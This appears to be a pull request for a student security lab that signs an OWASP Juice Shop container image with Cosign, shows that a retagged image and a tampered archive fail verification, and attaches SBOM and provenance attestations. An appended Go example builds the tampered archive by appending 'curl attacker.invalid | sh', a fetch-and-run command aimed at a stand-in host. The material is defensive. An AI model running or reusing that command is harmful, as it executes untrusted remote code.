Feature/lab8 #4
Open
raaller wants to merge 5 commits into
Goal
Sign the OWASP Juice Shop v20.0.0 container image by immutable digest using Cosign, demonstrate that a substituted image cannot pass signature verification, attach verified CycloneDX SBOM and SLSA provenance attestations, and implement blob signing as a mitigation for the Codecov 2021 attack class.
Changes
- submissions/lab8.md
- labs/lab8/keys/cosign.pub
- labs/lab8/keys/.gitignore (keeps cosign.key from being committed)
- labs/lab8/results/
Environment
Testing
Local registry and image push
Result:
Cosign image signing
Result:
Original image verification
Result:
Verified manifest digest:
Tampered-image verification
Alpine 3.20 was pushed under a Juice Shop-looking tag:
Tampered digest:
Verification:
Result:
The failure is expected because the signature is bound to the original immutable digest rather than the mutable image tag.
Original-image sanity verification
The original digest was verified again after the tamper test:
This confirms that pushing an unsigned image under another tag does not affect the signature associated with the original digest.
CycloneDX SBOM attestation
Verification:
Results:
The decoded attestation is bound to:
Predicate type:
SLSA provenance attestation
Verification:
Results:
Predicate type:
Blob signing
Created artifacts:
Original blob verification
Result:
Tampered-blob verification
A malicious payload was appended to a copy of the signed archive before verification.
Result:
The failure is expected because the signature is bound to the original artifact byte stream.
Security analysis
Digest binding
OCI tags are mutable and can be reassigned to different manifests. Cosign signs the immutable manifest digest, so replacing or retagging an image produces a different digest that cannot satisfy the original signature.
Signed SBOM
An image signature proves that a specific digest was approved by the expected signer, but it does not describe the image contents. The signed CycloneDX attestation provides a verifiable software inventory bound to the same digest, allowing admission policies and incident-response tooling to determine whether a vulnerable dependency is present.
Codecov 2021 mitigation
The Codecov uploader attack relied on consumers executing modified remote content without authenticating its bytes. Running cosign verify-blob before executing the downloaded artifact would reject an attacker-modified uploader because the downloaded content would no longer match the signed artifact.
Artifacts
Submission report:
- submissions/lab8.md
Cosign key material:
- labs/lab8/keys/cosign.pub
- labs/lab8/keys/.gitignore
Image signing evidence:
- labs/lab8/results/juice-shop-digest.txt
- labs/lab8/results/sign-image.txt
- labs/lab8/results/verify-original.json
- labs/lab8/results/verify-tampered.txt
- labs/lab8/results/verify-tampered.exit-code.txt
- labs/lab8/results/verify-original-sanity.json
SBOM attestation evidence:
- labs/lab8/results/sbom-attest.txt
- labs/lab8/results/sbom-attestation-report-excerpt.json
- labs/lab8/results/sbom-component-counts.txt
- labs/lab8/results/sbom-component-count-diff.txt
- labs/lab8/results/sbom-full-normalized-diff.txt
Provenance evidence:
- labs/lab8/results/provenance-predicate.json
- labs/lab8/results/provenance-attest.txt
- labs/lab8/results/provenance-statement.json
- labs/lab8/results/provenance-verify.jsonl
Blob-signing evidence:
- labs/lab8/results/my-tool.tar.gz
- labs/lab8/results/my-tool.tar.gz.bundle
- labs/lab8/results/blob-sign.txt
- labs/lab8/results/blob-verify-success.txt
- labs/lab8/results/blob-tamper.txt
- labs/lab8/results/blob-tamper.exit-code.txt
The private key labs/lab8/keys/cosign.key is intentionally excluded from Git.
Checklist
- feat(labN): <topic> convention
- submissions/lab8.md
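The digest-binding and blob-tampering checks this submission describes (tampered-image verification, original-image sanity verification, tampered-blob verification, and the Codecov mitigation), replayed as an added Go example. This is not code from the submission or from cosign: it uses a constructed in-memory registry, constructed manifest and archive bytes, an assumed local-registry tag, and ECDSA P-256 over SHA-256 (the key type cosign generate-key-pair produces); it signs the digest string directly, a simplification of cosign's SimpleSigning payload, which embeds the digest in JSON.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
)

// Digest returns the sha256 digest of an artifact's bytes in the form an OCI
// registry reports for a manifest ("sha256:<hex>").
func Digest(b []byte) string {
	sum := sha256.Sum256(b)
	return "sha256:" + hex.EncodeToString(sum[:])
}

// Registry is a constructed stand-in for an OCI registry: manifests live in a
// content-addressed store keyed by digest, tags are mutable pointers into it.
type Registry struct {
	tags      map[string]string // tag -> digest, reassigned by any later push
	manifests map[string][]byte // digest -> manifest bytes, never rewritten
}

// Push stores a manifest by digest and points tag at it (retagging if present).
func (r *Registry) Push(tag string, manifest []byte) string {
	d := Digest(manifest)
	r.manifests[d] = manifest
	r.tags[tag] = d
	return d
}

// Sign signs a digest with ECDSA P-256 over SHA-256. Real cosign signs a
// SimpleSigning JSON payload that embeds the digest; signing the digest string
// directly is an assumed simplification that keeps the same binding.
func Sign(key *ecdsa.PrivateKey, digest string) ([]byte, error) {
	h := sha256.Sum256([]byte(digest))
	return ecdsa.SignASN1(rand.Reader, key, h[:])
}

// Verify checks a signature against a digest with the signer's public key.
func Verify(pub *ecdsa.PublicKey, digest string, sig []byte) bool {
	h := sha256.Sum256([]byte(digest))
	return ecdsa.VerifyASN1(pub, h[:], sig)
}

// VerifyTag is what a consumer that trusts a tag does: resolve the tag to
// whatever digest it points at now and check the signature against that.
func (r *Registry) VerifyTag(pub *ecdsa.PublicKey, tag string, sig []byte) bool {
	return Verify(pub, r.tags[tag], sig)
}

// Scenario records the outcome of replaying the lab's checks.
type Scenario struct {
	OriginalOK      bool // signature verifies against the signed digest
	RetaggedOK      bool // tag reassigned to another image still verifies?
	OriginalStillOK bool // original digest unaffected by the retag
	BlobOK          bool // signed blob verifies
	TamperedBlobOK  bool // blob with an appended payload still verifies?
}

// RunScenario replays the lab with constructed manifests and blobs (distinct
// byte strings standing in for the Juice Shop and Alpine manifests).
func RunScenario() (Scenario, error) {
	var s Scenario
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return s, err
	}
	reg := &Registry{tags: map[string]string{}, manifests: map[string][]byte{}}
	tag := "localhost:5000/juice-shop:v20.0.0" // assumed local-registry tag

	// Image signing: sign the digest the tag resolves to at signing time.
	signedDigest := reg.Push(tag, []byte(`{"schemaVersion":2,"config":"juice-shop"}`))
	imgSig, err := Sign(key, signedDigest)
	if err != nil {
		return s, err
	}
	s.OriginalOK = Verify(&key.PublicKey, signedDigest, imgSig)

	// Tampering: push another manifest under the same tag. The tag now resolves
	// to a different digest, so tag-based verification fails, while the
	// original digest the registry still holds keeps verifying.
	reg.Push(tag, []byte(`{"schemaVersion":2,"config":"alpine-3.20"}`))
	s.RetaggedOK = reg.VerifyTag(&key.PublicKey, tag, imgSig)
	s.OriginalStillOK = Verify(&key.PublicKey, signedDigest, imgSig)

	// Blob signing: the signature binds the exact byte stream of the archive,
	// so appending a payload (the Codecov pattern) breaks verification.
	blob := []byte("constructed my-tool.tar.gz contents")
	blobSig, err := Sign(key, Digest(blob))
	if err != nil {
		return s, err
	}
	s.BlobOK = Verify(&key.PublicKey, Digest(blob), blobSig)
	tampered := append(append([]byte{}, blob...), "\ncurl attacker.invalid | sh"...)
	s.TamperedBlobOK = Verify(&key.PublicKey, Digest(tampered), blobSig)
	return s, nil
}
```

RunScenario returns OriginalOK, OriginalStillOK and BlobOK true and RetaggedOK and TamperedBlobOK false, mirroring the five results recorded in labs/lab8/results. The check is only as strong as the public key's distribution: a consumer that fetches cosign.pub from the same channel as the artifact gains nothing, so the key must come from a path the artifact's attacker does not control.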